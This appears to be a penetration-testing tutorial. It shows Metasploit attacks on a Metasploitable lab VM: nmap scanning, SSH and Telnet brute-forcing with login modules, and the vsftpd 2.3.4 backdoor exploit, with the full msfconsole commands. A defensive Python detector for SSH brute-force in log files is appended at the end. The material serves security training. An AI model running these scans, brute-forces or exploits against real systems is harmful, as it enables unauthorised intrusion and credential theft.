Step 1: Open both machines, Kali Linux and Metasploitable. I’m using VirtualBox to run both machines simultaneously; you can do the same. Check the IP addresses so that we know the target IP address, using the command:
$ ifconfig
Step 2: Now we are going to perform an Nmap scan to get the list of open ports on the target machine. To do so, use the command:
$ nmap -sS -sV 192.168.10.3  # 192.168.10.3 is the IP address of the target machine
This will show us the list of all the open ports and the services running on them.
In the above image, you can see there are a bunch of open ports and services running on them.
Automating the Process Between Nmap and Metasploit
For users working on a large network with multiple targets, manually inputting IPs after an Nmap scan can be time-consuming. To streamline the process, you can automate the transition between Nmap scanning and the brute-force attack by exporting the scan results to an XML file and importing them directly into Metasploit’s database.
1. Perform an Nmap scan and save the results in XML format:
$ nmap -sS -sV -oX scan_results.xml 10.10.64.213 # This saves the Nmap scan results in scan_results.xml.
2. Import the XML results into Metasploit:
$ msfconsole
msf6 > db_import scan_results.xml
3. List the imported hosts:
The command below displays all hosts discovered by the Nmap scan.
msf6 > hosts
4. Use Metasploit modules based on the imported data:
Now, instead of manually entering the target IP, Metasploit will automatically recognize the available hosts and services.
Step 3: You can see that port 22/tcp is running the SSH service, version OpenSSH 4.7p1 Debian. Now we are going to brute-force this port from our Kali Linux virtual machine.
Now open msfconsole in the terminal by typing the command below:
msfconsole
Now we are going to search for the ssh_login auxiliary modules by using the search command in msfconsole, as you can see in the image below.
search ssh
We will use auxiliary/scanner/ssh/ssh_login from the results. To use this module, type the command:
msf6 > use auxiliary/scanner/ssh/ssh_login
Now let’s see the options available to set our target. To see the options, use the command show options.
msf6 auxiliary(scanner/ssh/ssh_login) > show options
You can see in the above image we have a bunch of different options to set before launching our attack.
Step 4: Now set the required options and launch the attack.
Set the required options with the set command, as shown in the image below.
set RHOST 192.168.10.3
set THREADS 3
set STOP_ON_SUCCESS true
set VERBOSE true
After these options are set, we are going to use a password list, as the program doesn’t have one. So, to show you a successful attack, I have created a password list that contains usernames and passwords separated by a space, as it says in the image above for USERPASS_FILE.
Now set the password list with the set command, as shown in the image below:
set USERPASS_FILE (path to the password list)
Step 5: We are all set to go, and now we can launch the attack and watch each attempt on the terminal. To launch the attack, use the run command.
After you type the run command, it will start brute-forcing the system, and when the attack is successful it will return the username and password. As you can see in the image below, the default password for Metasploitable 2 is msfadmin and the username is also msfadmin, and the attack has been successful.
Example 2: Performing an Attack on FTP Server with Metasploit
Step 1: Open both machines, Kali Linux and Metasploitable. I’m using VirtualBox to run both machines simultaneously; you can do the same. Check the IP addresses so that we know the target IP address, using the command:
$ ifconfig
Step 2: Now we are going to perform an Nmap scan to get the list of open ports on the target machine. To do so, use the command:
$ nmap -sS -sV 192.168.10.3  # 192.168.10.3 is the IP address of the target machine
This will show the open ports and the versions of the services on the target machine.
Step 3: In the above output you can see that we have an open FTP port, 21/tcp, and the version is vsftpd 2.3.4, so we are going to exploit this vulnerability using Metasploit with simple steps.
Open msfconsole and type the command for using the vsftpd exploit
$ msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
Now that we can see we are using the exploit, let’s set the RHOST, i.e. the target IP address.
We can see in the above image that we have to specify RHOST and RPORT. RPORT is set to 21 by default, as we want it to be, so let’s set RHOST to the target IP address and run the exploit.
msf6 > set RHOST 192.168.10.3
Now that we have provided all the parameters, we can run the exploit and see if it gives us access to the machine. To run an exploit, you can use the command:
msf6 > run
You can see in the above output we have successfully gained access to the machine by exploiting the FTP server using Metasploit.
Example 3: Performing an Attack on Telnet Service with Metasploit
Step 1: Open both machines, Kali Linux and Metasploitable. I’m using VirtualBox to run both machines simultaneously; you can do the same. Check the IP addresses so that we know the target IP address, using the command:
$ ifconfig
Step 2: Now we are going to perform an Nmap scan to get the list of open ports on the target machine. To do so, use the command:
$ nmap -sS -sV 192.168.0.108  # 192.168.0.108 is the IP address of the target machine
The above two steps are the same as we have done for SSH and FTP.
Step 3: Now open msfconsole and search for the telnet auxiliary modules. To do so, type the command:
msf6 > search type:auxiliary telnet
Step 4: Now we select the auxiliary module that we will use to perform a brute-force attack on port 23 of the target machine, and we also look at the options we have to set to perform the attack.
msf6 > use auxiliary/scanner/telnet/telnet_login
msf6 auxiliary(scanner/telnet/telnet_login) > show options
Step 5: We need to set a bunch of options, like RHOST, PASS_FILE, and USER_FILE. You can create these files or download them from the internet; I have created them locally to show how to use them. Finally, we need to set STOP_ON_SUCCESS to true. To do all of this, refer to the images below.
set PASS_FILE /home/lucifer/Desktop/pass.txt
set USER_FILE /home/lucifer/Desktop/user.txt
set STOP_ON_SUCCESS true
Step 6: Now we are all set to run the exploit. To do so, simply type the run command.
run
In the above image, you can see that we have successfully found the matching credentials msfadmin:msfadmin; msfadmin is the default password for Metasploitable machines.
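What the SSH login scan from the first example looks like from the target's side, as an added example that is not part of the original post: a detector that counts failed sshd password attempts per source IP and reports when a success follows the burst, which is the pattern a run with STOP_ON_SUCCESS leaves behind. The log lines are constructed, and the function name and the threshold of 5 are assumptions.

```python
import re

# Constructed sample sshd log lines (not captured from a real host).
SAMPLE_LOG = """\
Apr  6 10:01:02 metasploitable sshd[4101]: Failed password for invalid user admin from 192.168.10.2 port 40110 ssh2
Apr  6 10:01:02 metasploitable sshd[4102]: Failed password for root from 192.168.10.2 port 40112 ssh2
Apr  6 10:01:03 metasploitable sshd[4103]: Failed password for invalid user test from 192.168.10.2 port 40114 ssh2
Apr  6 10:01:03 metasploitable sshd[4104]: Failed password for msfadmin from 192.168.10.2 port 40116 ssh2
Apr  6 10:01:04 metasploitable sshd[4105]: Failed password for msfadmin from 192.168.10.2 port 40118 ssh2
Apr  6 10:01:05 metasploitable sshd[4106]: Accepted password for msfadmin from 192.168.10.2 port 40120 ssh2
Apr  6 10:07:41 metasploitable sshd[4150]: Failed password for user from 192.168.10.50 port 51522 ssh2
Apr  6 10:07:49 metasploitable sshd[4151]: Accepted password for user from 192.168.10.50 port 51524 ssh2
"""

# Matches OpenSSH password-auth results, with or without the "invalid user" prefix.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text, threshold=5):
    """Return {source_ip: stats} for IPs with at least `threshold` failed logins.

    stats["compromised"] is the first account that logged in successfully
    from that IP after the threshold was reached, or None if none did.
    """
    state = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not a password-auth result line
        s = state.setdefault(
            m["ip"], {"failures": 0, "users": set(), "compromised": None}
        )
        if m["result"] == "Failed":
            s["failures"] += 1
            s["users"].add(m["user"])
        elif s["failures"] >= threshold and s["compromised"] is None:
            # Success right after a burst of failures: treat as a guessed password.
            s["compromised"] = m["user"]
    return {ip: s for ip, s in state.items() if s["failures"] >= threshold}


if __name__ == "__main__":
    for ip, s in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, s["failures"], sorted(s["users"]), "compromised:", s["compromised"])
```

The single mistyped password from 192.168.10.50 stays below the threshold and is not reported, while 192.168.10.2 is flagged with the account that was guessed.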